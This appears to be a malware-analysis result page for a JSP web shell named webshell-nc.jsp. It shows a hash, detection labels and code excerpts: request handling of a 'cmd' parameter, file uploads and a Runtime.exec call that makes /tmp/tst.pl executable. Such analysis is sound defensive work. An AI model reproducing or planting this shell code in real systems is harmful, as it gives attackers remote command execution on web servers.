Hostile 92% Download

webshell-nc.jsp

Web shell executes commands

JSP runs the cmd request parameterWeb Shell
SHA-25623c6ec0fa69a46fadc013bb6a8aadbd5fe98e1146eb9da448dc03ece5fc564a0

Evidence

JSP reads a request parameter lines 5–23
⋯4 lines
9 */
10%>
11<%@page contentType="text/html;charset=utf-8"%>
12<%@page import="java.io.*,java.util.*,java.net.*"%>
13<%
14 session.setMaxInactiveInterval(6000);
15 final String URL = request.getRequestURI();
16 final String isLogout = request.getParameter("isExit");
17 System.out.println(isLogout);
18 if("isExit".equals(isLogout)){
⋯5 lines
Web Shell lines 157–174
⋯5 lines
162
163 public String getTimeElapsed() {
164 long time = (System.currentTimeMillis() - starttime) / 1000l;
165 if (time - 60l >= 0) {
166 if (time % 60 >= 10)
⋯8 lines
JSP reads cmd request parameter lines 491–510
491:30… rUnit;
492 strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor;
493 if (strAfterComma == "")
494 strAfterComma = ".0";
495 return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
496 }%>
497<%
⋯4 lines
502 String strFile = request.getParameter("file");
503 String strPath = strDir + strSeparator + strFile;
504 String strCmd = request.getParameter("cmd");
505 StringBuffer sbEdit = new StringBuffer("");
506 StringBuffer sbDown = new StringBuffer("");
⋯4 lines
Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp lines 680–693
680:9… ble ht = parser.processData(request.getInputStream(),
681 bound, tempdir, clength);
682 if (ht.get("cqqUploadFile") != null) {
683 FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
684 File f1 = fi.file;
685 UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
686 if (info != null && info.aborted) {
687 f1.delete();
⋯6 lines
Java getRuntime call reference lines 1105–1116
1105:24… = strShell[1];
1106 strCommand[2] = "chmod +x /tmp/tst.pl";
1107 //System.out.println(strCommand);
1108 Process p = Runtime.getRuntime().exec(strCommand, null,
1109 new File(strDir));
1110 BufferedReader br = new BufferedReader(
⋯6 lines

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.